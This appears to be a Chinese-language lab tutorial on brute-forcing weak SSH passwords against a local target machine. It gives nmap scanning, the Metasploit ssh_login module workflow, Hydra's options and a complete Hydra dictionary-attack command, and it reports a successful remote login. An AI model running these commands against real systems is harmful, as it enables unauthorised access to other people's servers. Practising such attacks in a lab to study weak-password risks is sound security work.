ssh弱口令暴力破解
ssh (安全外壳协议)
SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平台,都可运行SSH。
如果管理员设置有弱口令,我们就可以使用工具进行爆破,达到远程登录的目的。
漏洞复现
在靶机上使用netstat -tnl
查看ssh的22端口是否开放。
使用:systemctl status sshd
查看服务是否开启。
信息搜集总在前,使用nmap 进行端口扫描。
这里使用nmap -A -Pn -T4 192.168.41.140
进行扫描。
不出意外,22端口正常打开。
1、使用MSF爆破
使用msfconsole
打开
使用search ssh_login
搜索ssh登录模块
使用use 0
打开 第一个模块
使用show options
查看配置项
设置配置项
爆破结果
绿色加号的为爆破成功的组合,我们远程登录试试。
成功登录!
2、使用Hydra爆破
Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。
参数
R:继续从上一次进度接着破解-S:大写,采用SSL链接-s <PORT>:小写,可通过这个参数指定非默认端口-l <LOGIN>:指定破解的用户,对特定用户破解-L <FILE>:指定用户名字典-p <PASS>:小写,指定密码破解,少用,一般是采用密码字典-P <FILE>:大写,指定密码字典-e <ns>:可选选项,n:空密码试探,s:使用指定用户和密码试探-C <FILE>:使用冒号分割格式,例如“登录名:密码”来代替 -L/-P 参数-M <FILE>:指定目标列表文件一行一条-o <FILE>:指定结果输出文件-f :在使用-M参数以后,找到第一对登录名或者密码的时候中止破解-t <TASKS>:同时运行的线程数,默认为16-w <TIME>:设置最大超时的时间,单位秒,默认是30s-v / -V:显示详细过程server:目标ipservice:指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等OPT:可选项
使用:
hydra -L /home/user/桌面/user.txt -P /home/user/桌面/passwd.txt -o ssh.txt -vV -t 5 192.168.41.140 ssh#-L指定用户字典 -P 指定密码字典 -o把成功的输出到ssh.txt文件 -vV显示详细信息-t 指定线程数
结果:
成功访问
ok!